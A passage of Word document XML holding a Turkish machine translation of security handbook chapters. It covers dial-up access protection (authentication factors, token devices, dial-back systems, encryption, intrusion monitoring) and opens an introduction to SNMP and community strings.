          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mikrobilgisayar Parola Sorunları</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krobilgisayar ve iletişim yazılım paketlerinin kullanılması, güvenlik için şifrelere dayananlara başka bir sorun ortaya çıkardı. Bu paketler kullanıcının telefon numaraları, kullanıcı kimliği ve şifreler gibi kritik bilgileri saklamasını ve iletmesini sağ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crosoft Windows 95 Çevirmeli Ağ programı veya Symantec’in PCANYWHERE gibi birçok uzaktan erişim programı, kullanıcıya kullanıcı kimliğini, şifreyi ve telefon numarasını ileride kullanmak üzere kaydetme seçeneği sunar. Bu uygulama özellikle dizüstü bilgisayarlarda kesinlikle önerilmemelidir. Dizüstü bilgisayarlar, hem fiziksel eşya hem de içerdiği bilgiler için hırsızlık için ana hedeflerdir. Bir hırsız, çevirmeli ağ oturum bilgileri (telefon numarası, kullanıcı kimliği ve şifre) kaydedilmiş bir dizüstü bilgisayarı çalsa, sahibinin hangi sisteme erişebildiğini anında tam olarak göre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izüstü bilgisayar güvenliği tartışması başlı başına bir bölüme layıktır; Ancak, bu tartışmanın amaçları doğrultusunda, kullanıcıların çevirmeli bağlantı uygulamalarını kullanma ve güvenceye alma konusunda tam olarak eğitilmeleri gerektiğini söylemek gerekir.</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>Güvenliği arttırmanın etkili ancak daha zahmetli bir yolu, varış yerinin görünür tanımını ve tespit bilgisini gizlemektir. Kullanıcı artık görünmeyene kadar ekran yoğunluğunu azaltabilir veya oturum açma tamamlanıp tüm güvenlik bilgileri ekrandan silinene kadar monitörü kapatabilir. Bazı yazılım paketleri, oturum açma işlemi tamamlandığında bilgisayarın sesli bir uyarı vermesini sağlayarak kullanıcıyı uyarır. Sesli sinyal vermeyen yazılım paketleri bile bu karartma tekniği ile geliştirilebilir. Oturum açma işlemini tamamlamak için gereken zaman miktarının tahmini, bilgilerin tekrar ne zaman görünür hale geleceği konusunda fikir verebilir.</w:t>
      </w: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6 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KISA BİR YETKİ GEREKLİLİKLERİ İNCELEME</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nsanlık tarihi ve irfan boyunca, aşağıdakilerden birini göstererek bir kişinin kimliği doğrulandı:</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bildiğiniz bir şey</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ahip olduğun bir şey</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olduğunuz bir şey</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li Baba'nın “Açıl Susam” (bildiğiniz bir şey) dediği gibi, Indiana Jones kadrosundaki kristaliyle (sahip olduğunuz bir şey) veya “Binici geliyor… Bu Dusty !! Kapıları açın! Kapıları açın !! ”(fiziksel tanıma - olduğunuz bir şey), bir kişi bu“ kimlik belirleme faktörlerinden ”birini karşılayarak başka birine erişim izni verdi veya reddetti.</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bilme (bildiğiniz bir şey) gibi yalnızca bir faktörün yerine getirilmesi kolayca yenilebilir. Güvenli ortamlarda, üç tanımlama faktöründen en az ikisini karşılamak daha iyidir. Bu en iyi bir banka ATM kartı başvurusunda görülebilir. Kartı kullanmak - bir hesaba erişmek için - birinin bir ATM kartı (sahip olduğunuz bir şey) olması ve o karta atanan PIN kodunu (bildiğiniz bir şey) bilmesi gerekir. Ne zaman ve sadece bir kişi her iki tanımlama faktörünü karşılayabiliyorsa, hesaptaki paraya ulaşıla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Üçüncü tanımlama faktörü, retinal taramalar, parmak izleri ve sesli izler gibi biyometri kullanımıyla bugün temsil edilmekte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Günümüz piyasasında güvenli arama, bu üç tanımlama faktöründen en az ikisini karşılayabilme yeteneği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7 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fiziksel Cihaz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lar, çevirmeli ağ ortamında kimlik doğrulama ve kimlik doğrulama güvenliği sağlama açısından nispeten ucuz bir yöntem olsa da, fiziksel cihazlar sermaye harcamasını gerektirir. Maliyet, cihazın karmaşıklığına bağlıdır. Hangi cihazın belirli bir ortama en uygun olduğunu belirlemek, yetkisiz çevirmeli penetrasyonun sonuçlarının dikkatlice analizini gerektir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iyasa, mevcut teknoloji ve piyasa güçlerine cevap olarak sürekli değişiyor. Şu anda, çevirmeli kaynakların korunmasında bir teknoloji baskın: dinamik şifre üreticileri. En temel şekliyle, dinamik parola üreteci kimlik doğrulama sistemine iki bileşen vardır: satıcı tarafından sağlanan uzaktan erişim kodunu yürüten bir sunucu olabilecek ana bilgisayar sistemi veya üreticinin sağladığı donanım / yazılım ön uç ve bir el cihazı, genellikle bir hesap makinesine veya kredi kartına benzer. Bu alanda iki zamanlama var, zaman senkronlu ve meydan okuma / cevap.</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8 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zaman Senkron</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="360"/>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 satıcı bu pazarda, Security Dynamics Technologies, Inc. şirketine aittir (http://www.securid.com/). Ürün serileri, kısmen Greenwich Ortalama Saati'ne (GMT) dayanan, her 60 saniyede bir yeni altı basamaklı şifre üreten özel yazılım içermektedir. Bir </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kullanıcıya, uzaktan erişim cihazında merkezi bir veri tabanında kayıtlı küçük bir kredi kartı boyutunda "belirteç" verilir. Bir kullanıcı aradığında, kullanıcı kimliğine ve o anda ekranda beliren şifreye göre kullanıcının kimliğini doğrulayan uzaktan erişim cihazına ulaşır. Kimlik doğrulamasından sonra, kullanıcıya hedef cihaza veya ağa erişim izni verilir. Güvenlik Dinamiklerinin belirteçlerinin çeşitli türleri ve uygulamaları (kredi kartı boyutunda, anahtarlıklar, PCMCIA kartları ve yazılım tabanlı) ve kimlik doğrulamalarının “çekirdeği” veya kodlarının birçok farklı uygulamasına sahiptir. Ek olarak, birçok üçüncü taraf ürünü uzaktan erişim / kimlik doğrulama ürünlerinde Security Dynamics kodunu lisanslamıştı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9 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sınama / Yanıt</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rkaç satıcı, elde tutulan belirteçleri ve PC yazılımını kullanan başka bir çevirmeli kimlik doğrulama yöntemi uygulamıştır. Zaman eşzamanlı belirteçler mevcut GMT'ye göre oluşturulan bir şifreye dayanırken, meydan okuma / yanıt belirteçleri paylaşılan bir algoritma ve benzersiz bir "tohum" değeri veya anahtarı kullanır. Bir arama kullanıcısı bir meydan okuma / yanıt belirteci kullanarak bir uzaktan erişim cihazına eriştiğinde, kullanıcının belirteci tarafından oluşturulan belirli bir "meydan okuma" için beklenen "yanıt" temelinde kimliği doğrulanır. Meydan okuma / cevap teknolojisi ayrıca farklı tiplerde ve belirteçlerin, yazılımların ve donanımların uygulamalarında da gelir. Başlıca meydan okuma / yanıt teknolojisi satıcıları arasında AssureNet Pathways, Inc. (http://www.assurenetpathways.com/) ve LeeMah Datacom Security Corporation (http://www.leemah.com/) bulunmaktad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0 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çevirmeli / Geri Arama Sistemleri</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Yalnızca önceden kodlanmış tanımlayıcılar kullanıldığında mümkün olan sistem sızma türüne karşı koruma sağlamak için, üreticiler çevirmeli / geri arama sistemleri geliştirmiştir. Bu teknikle erişim izni verilmeden önce iki telefon görüşmesi yapılmalıdır. Ana bilgisayarı çevirdikten sonra, kullanıcı geçerli bir şifre girmelidir. Şifrenin alınmasından sonra, ana bilgisayar bağlantıyı sonlandırır ve şifre ile ilişkilendirilmiş olan telefon numarasına otomatik olarak bir arama yapar. Yetkili bir terminal kullanılıyorsa, bağlantı kurulur ve kullanıcı devam edebilir. Bazı çevirmeli / geri arama sistemleri, geri dönüş çağrısını yerel hatlarda, WATS hatlarında ve diğer genel taşıyıcı tesislerinde en düşük maliyetli rotalama yoluyla yapar, böylece geri arama prosedürünün maliyetini düşürü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virmeli / geri arama sistemleriyle ilgili sorunlardan biri, yetkili arayan kişinin önceden belirlenmiş tek bir yerle sınırlı olmasıdır. Bu kısıtlama, seyahat atamaları için taşınabilir terminallerin kullanılmasını yasaklar. Ayrıca farklı sitelerde kullanım için birden fazla kimlik gerektiri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1 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Diğer Teknolojile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alan değişiyor. Bir kuruluş, örgütsel gereksinimlerine bağlı olarak daha yeni veya daha az popüler olan teknolojileri araştırmak isteyebilir. Bir PC veya dizüstü bilgisayarın seri veya paralel bağlantı noktasına, PCMCIA kartlarına ve biyometriye bağlanan cihazlardı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inamik şifre üreticileri bugün seçimin doğrulanması ise, biyometri yarın seçimin doğrulanması olacaktır. Son gelişmeler güvenilirliği önemli ölçüde arttırmış ve maliyetleri düşürmüştür. Önümüzdeki birkaç yıl içinde biyometrik kimlik doğrulamasında daha fazla ürün teklifi görmeyi bekleyin.</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u cihazlardan herhangi birini satın alma kararı, donanımın izlenmesi için kurulum maliyeti ve işçilik maliyeti gibi faktörlere bağlıdı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 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ŞİFRELEME</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Yetkilendirilmemiş bir çevirmeli bağlantı kullanıcısı bir bilgisayar sisteminin tanımlamasına ve onaylama savunmasına girerse, veri değişikliğini ve hırsızlığı önlemezse, şifreleme zarar verebilir. Şifreleme, saf bir güvenlik önlemi yerine teknik olarak bir gizlilik önlemidir. Bilginin, uygun şifre çözme yeterliliği olmayan (anahtar, algoritma veya şifre çözme cihazı) kimseye anlaşılmaz olmasını sağlamak amaçlanmıştır. Bu, bir sisteme erişen yetkisiz personelin değiştirmek, yok etmek veya dağıtmak isteyebilecekleri verileri okuyabilmesini önler.</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Veri iletişimi için, mesajlar iletim noktasında şifrelenir ve yalnızca şifreleme işleminde kullanılan anahtarla birlikte verilen bir terminalde şifresi çözülebilir. Çeşitli şifreleme algoritmaları mevcuttur ve algoritmanın karmaşıklığı korunmakta olan verinin değerine bağlı olmalıdır. Federal Hükümetin sivil kurumları tarafından kullanılacak tek şifreleme yöntemi olan Ulusal Standartlar ve Teknoloji Enstitüsü'nün Veri Şifreleme Standardı (DES) yaygın olarak kullanılmaktadır ve otomatik saldırılara karşı oldukça dirençlidir. Şifreleme, mikrobilgisayar iletimleri için, özellikle hücresel iletişimlerin kullanılması muhtemel olduğunda dikkate alınmalıdır. Bu, açık hava dalgaları üzerinden açık metin gönderimini ortadan kaldırır.</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Şifreleme ve şifre çözme işlemi öncelikle veri aktarımında kullanılsa da, kritik dosyaları ve programları dış tehditlerden koruyabilir. Şifreleme verileri ve program kaynak kodu, yetkisiz bir kullanıcının dosyada hangi bilgileri veya kodları içerdiğini belirlemeyi zorlaştırır. Şifreleme dosyaları ayrıca, bu dosyaları kullanan programların kaynak kodunu okuyarak tespit edilebilecek dosya ilişkilerini de korur. Davetsiz misafir için bir kuruluşun veri bileşenlerini bilmediği ve bundan dolayı, böyle bir engel herhangi bir yetkisiz faaliyeti engelleyebilir. Yetkili kullanıcılar için bile, şifreli dosyalar, kullanıcıların görmeye alıştıkları bilgilerle hiçbir ilgisi yoktur. Ayrıca, yalnızca anahtar dosyalar ve programlar için kullanılırsa, şifreleme önemli miktarda depolama alanı içermez.</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1 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NİHAİ SAVUNMA</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Bilgisayar korsanları, durdurma çabalarına rağmen bilgisayar sistemlerine erişmede gittikçe daha fazla önem kazanıyor. Herhangi bir sistemin güvenliğinin ihlal edilme olasılığı çok yüksektir. Bu durumda, bilgisayar korsanını tanımlamak ve aramayı izlemek veya bağlantıyı kesmek için etkili güvenlik önlemlerinin alınması zorunludur. İzinsiz erişim durdurulduktan sonra, güvenlik yöneticisinin erişimin nasıl kazanıldığını ve hasarın niteliğini ve kapsamını belirlemesi gerekir. Bu, hasarı onarmak ve savunmaları ilerideki saldırılara karşı güçlendirmek için gereklidir.</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Yetkisiz bir kullanıcıyı tanımlamanın yollarından biri, kullanıcıların güvenlik süreçlerinde bulunmayan işlemlere, dosyalara ve verilere erişme girişimlerini izlemektir. Tekrarlanan ihlaller varsa (örneğin, art arda reddedilen erişimler), bazı güvenlik önlemleri alınmalıdır. Bu, hattın bağlantısını kesmek, kullanıcı kimliğini geçersiz kılmak veya en azından kullanıcıyla daha fazla görüşmek üzere ihlalleri günlüğe kaydetmek şeklinde olabil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üyük bir kredi referans şirketi, bir kullanıcının bilgiye nasıl eriştiğine ilişkin normal bir aktivite modeli oluşturmak için yapay zekaya sahip post-inüzyon izleme yazılımı kullanır. Örneğin, XYZ001 kullanıcısı genellikle sosyal güvenlik numarasına göre arama yaparak müşteri bilgilerine erişebilir. XYZ002 kullanıcısı, bir kişinin adını ve adresini kullanarak bilgilere erişebilir. Bir kullanıcı oturum açtığında, o kişinin etkinlik düzeni izlenir ve kullanıcının normal faaliyet alanıyla karşılaştırılır. Büyük tutarsızlıklar ortaya çıktığında, şirket taleplerinin geçerliliğini sağlamak için müşteri ile iletişim kurmaya çalışır. Bu tür faaliyet izleme yetkisiz birçok kullanıcıyı engelledi.</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onuç olarak, sistemleri yetkisiz erişime karşı korumaya yardımcı olmak her kullanıcının sorumluluğundadır. Yardım etmenin en iyi yolu dikkatli olmaktır. Son kullanıcılar başarılı bir oturum açma sırasında görüntülenen son oturum açma zamanını ve tarihini kontrol etmelidir. Kullanıcının bunun geçerli bir oturum açma olduğuna dair herhangi bir şüphesi varsa, uygun yetkiliye başvurmalıdır. Bu sadece sistemi korumakla kalmaz, aynı zamanda bir davetsiz misafir başka birinin kimliğini kullandığında yarattığı sorumluluğun yetkili kullanıcısına da yardım eder.</w:t>
      </w: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2 </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TAVSİYE EDİLEN EYLEM KURSU</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erkezi veri kaynaklarını korumak için seçilen güvenlik yönteminin kurumun kaynakları ve prosedürleri üzerinde büyük etkisi vardır. İlk maliyetler, uygulama süresi, müşteri tepkisi ve ilgili faktörler ancak mevcut ve gelecekteki ihtiyaçları inceleyen kapsamlı bir risk analizi yapılarak ele alınabilir. Bu makalede açıklanan önlemler, izole edilmiş bir dizi önlem olarak değil, organizasyonu tüm iç ve dış tehditlerden korumak için tasarlanmış genel bir güvenlik şemsiyesinin bileşenleri olarak yorumlanmalıdır. Veri güvenliği yöneticisi, ilk adımın, tüm çevirmeli bağlantı kullanıcıları ile ilgilenmek için daha güvenli bir ortam yaratacak kurumsal bir farkındalık oluşturmak için bir temel oluşturmasını sağlamalıdır. Özellikle, yönetici şunları sağlamalıdır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Geçerli çevirmeli bağlantı kullanıcılarının ve mevcut durumlarının tam bir listesi tutulur, böylece artık şirkette bulunmayan ya da konumu artık erişim gerektirmeyen tüm çalışanlar ortadan kalk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üm şifre şemaları ve dosyalar için koruma sağlan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En az iki tanımlama faktörü sağlanmışt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Yeni indirilen yazılımı doğrulamak için bir test makinesi (herhangi bir ağa bağlı değil) kullanıl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üm kullanıcılara düzenli olarak güvenlik politikaları hatırlatılır ve bu politikaların mevcut sürümleri çalışanlara dağıtılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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Kapsamlı bir dizi politika ve eğitimli bir kullanıcı topluluğunun bir araya geldiği bu adımlar, bir çevirmeli ağın güvenliğini önemli ölçüde artırabilir.</w:t>
      </w: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Pr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SNMP hakkında bu kadar basit olmayan nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Chris Hare, CISSP, CISA</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asit Ağ Yönetimi Protokolü veya SNMP, Yorum İsteği (RFC) 1157'de açıklandığı gibi, İnternet Mühendisliği Görev Gücü tarafından belirlenmiş bir İnternet standardıdır. Bu bölüm, SNMP'nin ne olduğunu, nasıl kullanıldığını ve ağ yönetiminin karşılaştığı zorlukları ele almaktadır. ve kullanımıyla ilgili güvenlik uzmanları.</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bölümde birçok SNMP uygulaması belirtilmiş olsa da, bu uygulamaların hiçbir desteği veya önerisi yapılmamakta veya ima edilmemektedir. Herhangi bir uygulamada olduğu gibi, kurum SNMP uygulamasını kendi gereksinimlerine göre seçmelidir.</w:t>
      </w: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Tanımı</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NMP dünyadaki ağ ve bilgisayar cihazlarını izlemek için kullanılır. Basitçe belirtildiği gibi, ağ yöneticileri, ağ yönetimi istasyonu ve ağ cihazlarındaki SNMP aracıları </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>arasında hem durum hem de yapılandırma olan yönetim bilgilerini iletmek için SNMP'yi kullanı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rotokol uygun olarak adlandırılmıştır, çünkü bir ağın karmaşıklığına rağmen, SNMP'nin kendisi çok basittir. Mimariyi incelemeden önce, kullanılan terminolojinin gözden geçirilmesi gerekmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Ağ elemanı: ana bilgisayarlar, ağ geçitleri, sunucular, terminal sunucular, duvarlar, yönlendiriciler, anahtarlar ve etkin hub'lar dahil olmak üzere ağa bağlı herhangi bir cihaz.</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Ağ yönetim istasyonu (veya yönetim istasyonu): ağ öğelerini izlemek ve kontrol etmek için SNMP yönetim yazılımına sahip bir bilgi işlem platformu; ortak yönetim istasyonlarına örnek olarak HP Openview ve CA Unicenter verilebil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ajanı: yönetim istasyonundan alınan ağ yönetimi işlevlerini yerine getirmekten sorumlu bir yazılım yönetimi temsilcis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isteği: yönetim istasyonundan ağ cihazındaki SNMP aracısına gönderilen bir mesaj.</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tuzağı alıcısı: ağ istasyonundaki SNMP aracısından olay bildirimi mesajlarını alan yönetim istasyonundaki yazılım.</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Yönetim bilgi tabanı: SNMP veri tabanındaki elemanları tanımlayan standart bir yöntem</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ğ cihazlarının yönetimi için SNMP'ye yapılandırılmış bir ağ, en az bir SNMP ajanı ve bir yönetim istasyonundan oluşur. Yönetim istasyonu ağ elemanlarını yapılandırmak ve bu elemanlardan SNMP tuzakları almak için kullanılı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aracılığıyla, ağ yöneticisi çeşitli ağ elemanlarının durumunu izleyebilir, uygun konfigürasyon değişikliklerini yapabilir ve ağ elemanlarından alınan uyarılara cevap verebilir (bkz. Ek 23.1). Ağların büyüklüğü ve karmaşıklığı arttıkça, merkezi bir izleme ve yönetim yöntemi şarttır. Ağ yapısını bölümlere ayırmak veya ağın operasyonlarını bölgeselleştirmek için birden fazla yönetim istasyonu bulunabilir ve kullanılabil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cihaz hataları veya uyarılara ek olarak belirli bir ağ elemanı için yapılandırma bilgilerini alabilir. Hata koşulları bir SNMP aracısından diğerine değişecektir ancak ağ arayüzü arızalarını, sistem arızalarını, disk alanı uyarılarını vb. İçerecektir. Cihaz yönetim istasyonuna bir uyarı verdiğinde, ağ yönetimi personeli sorunu çözmek için araştırma yapabilir. Sistemlere erişim, bir şifre ile karşılaştırılabilen bir topluluk dizgisinin bilgisi ile kontrol edilir. Topluluk dizeleri, bölümün ilerleyen kısımlarında daha ayrıntılı olarak ele alınmaktadır, ancak kendi başlarına bir kimlik doğrulama şekli olarak değerlendirilmemelid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Zaman zaman yönetim istasyonunun cihaza yapılandırma istekleri göndermesi gerekir. Doğru topluluk dizesi sağlanırsa, cihaz yapılandırması uygun şekilde değiştirilir. Bu basit açıklama bile SNMP'den elde edilen değeri kanıtlar. Bir kuruluş tüm ekipmanlarının durumunu izleyebilir ve uzaktan sorun giderme ve yapılandırma yönetimi gerçekleştirebilir.</w:t>
      </w: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Yönetim Bilgi Tabanı (MIB)</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IB, ağ elemanının alınması veya yapılandırılması için mevcut bilgilerin kapsamını tanımlar. Tüm cihazların desteklemesi gereken standart bir MIB vardır. Cihazın üreticisi ayrıca ek yapılandırma parametrelerini desteklemek için cihaza özel uzantılar tanımlayabilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MIB uzantılarının tanımlanması, yönetim istasyonlarının MIB'yi doğru bir şekilde anlamaları ve yorumlamaları için belirlenmiş bir sözleşmeye uymalıdı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B, ASN.1 dili kullanılarak ifade edilir; ve farkında olmak önemli olsa da, MIB için özel olarak yeni unsurlar tasarlamadığınız sürece, bu önemli bir sorun değildir. Tüm MIB nesneleri, İnternet standardı MIB'ye veya tanımlanmış bir isimlendirme kuralı ile açıkça tanımlanmıştır. Tanımlanan adlandırma kurallarının kullanılması, ürün satıcılarının belirli bir ağ cihazı için MIB elemanının bireysel örneklerini oluşturma yeteneğini sınırlar. Çok sayıda SNMP özellikli cihaz ve nispeten küçük izleme istasyonu ekipmanı yelpazesi göz önüne alındığında, bu önemlid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B'nin bu noktadan daha iyi anlaşılması, yalnızca kendilerini gerçek MIB yapısı ve temsilleriyle ilgilenmesi gereken ağ tasarımcıları için gereklidir. Bu tartışma için MIB bileşenlerinin İngilizce tanımlayıcılar kullanılarak temsil edildiğini söylemek yeterlidir.</w:t>
      </w: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İşlemleri</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üm SNMP aracıları, MIB değişkenlerinin hem muayenesini hem de değiştirilmesini desteklemelidir. Bu işlemlere SNMP almak (alma ve inceleme) ve SNMP seti (değiştirme) denir. SNMP geliştiricileri, desteklemesi gereken temel yönetim işlevlerinin sayısını en aza indirmek ve diğer zorunlu yönetim komutlarının kullanılmasını önlemek için sadece bu iki işlemi kurdu. Çoğu ağ protokolü, hem istemcide hem de sunucuda bulunması gereken çok çeşitli potansiyel komutları destekleyecek şekilde geliştirilmiştir. Dosya Aktarım Protokolü (FTP), 74 komuttan daha fazlasını içerecek şekilde geliştirilen basit bir komut setine iyi bir örnekt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yönetim felsefesi, ağ elemanlarını uygun bilgi için yoklamak için yönetim istasyonunu kullanır. SNMP, izlenen sistemde çalışan aracıdan izleme istasyonuna mesaj göndermek için tuzakları kullanır ve daha sonra oylamayı kontrol etmek için kullanılır. Temsilci ile izleme istasyonu arasındaki mesaj sayısının sınırlandırılması, basitlik hedefine ulaşır ve ağ yönetimi işlevleriyle ilişkili trafik miktarını en aza indir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elirtildiği gibi, komut sayısının sınırlandırılması protokolün uygulanmasını kolaylaştırır: işletim sistemine bir arayüz geliştirmek, sistemin yeniden başlatılmasına neden olmak veya belirli bir süre geçtikten sonra yeniden başlatmayı zorlamak için değişkenlerin değerini değiştirmek gerekmez.</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ajanı ile yönetim istasyonu arasındaki etkileşim, protokol mesajlarının değişimi yoluyla gerçekleşir. Her mesaj, tek bir Kullanıcı Datagram Protokolü (UDP) paketi içinde bulunmak ve böylece yönetim yapısının ağ üzerindeki etkisini en aza indirecek şekilde tasarlanmıştır.</w:t>
      </w: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İdari ilişkile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Ağ elemanlarının yönetimi, elemanın kendisinde ve bir yönetim istasyonunda bir SNMP ajanı gerektirir. SNMP temsilcilerinin bir yönetim istasyonuna gruplandırılması topluluk olarak adlandırılır. Topluluk dizesi, aynı ağdaki toplulukları ayırt etmek için kullanılan tanımlayıcıdır. SNMP RFC, ağ cihazına yönetim istasyonundan doğru topluluk dizesinin sağlandığı mesaj olarak gerçek bir mesaj belirtir. Kimlik doğrulama şeması, topluluk dizesinden ve iletinin gerçekten orijinal olup olmadığını belirlemek için bir dizi kuraldan </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>oluşur. Son olarak, SNMP kimlik doğrulama servisi, oluşturulan kimlik doğrulama şemalarına göre otantik bir SNMP mesajını tanımlayan bir işlevi tarif ede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opluluklar adı verilen idari ilişkiler, izlenen bir aygıtı yönetim istasyonuyla eşleştirir. Bu program sayesinde, idari ilişkiler aygıtlar arasında ayrılabilir. Bir topluluk içinde belirlenen temsilci ve yönetim istasyonu SNMP erişim politikasını oluşturur. Yönetim istasyonları doğrudan aracıyla veya ağ tasarımı durumunda bir SNMP proxy aracısıyla iletişim kurabilir. Proxy aracı, izlenen cihaz ile yönetim istasyonu arasındaki iletişimi ilet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roxy ajanlarının kullanımı, modemler, çoklayıcılar ve farklı yönetim çerçevelerini destekleyen diğer cihazlar dahil olmak üzere tüm ağ elemanları ile iletişime izin verir. Proxy aracısı tasarımından elde edilen ek faydalar, ağ elemanlarını erişim politikalarına karşı korumalı ve karmaşık olabil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opluluk dizesi, kullanılacak erişim politikası topluluğunu oluşturur ve şifrelerle karşılaştırılabilir. Topluluk dizesi, aracıya genel topluluk olarak da adlandırılan salt okunur modda veya özel topluluk olarak bilinen okuma-yazma modunda erişmek için parola oluşturur.</w:t>
      </w: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İstekleri</w:t>
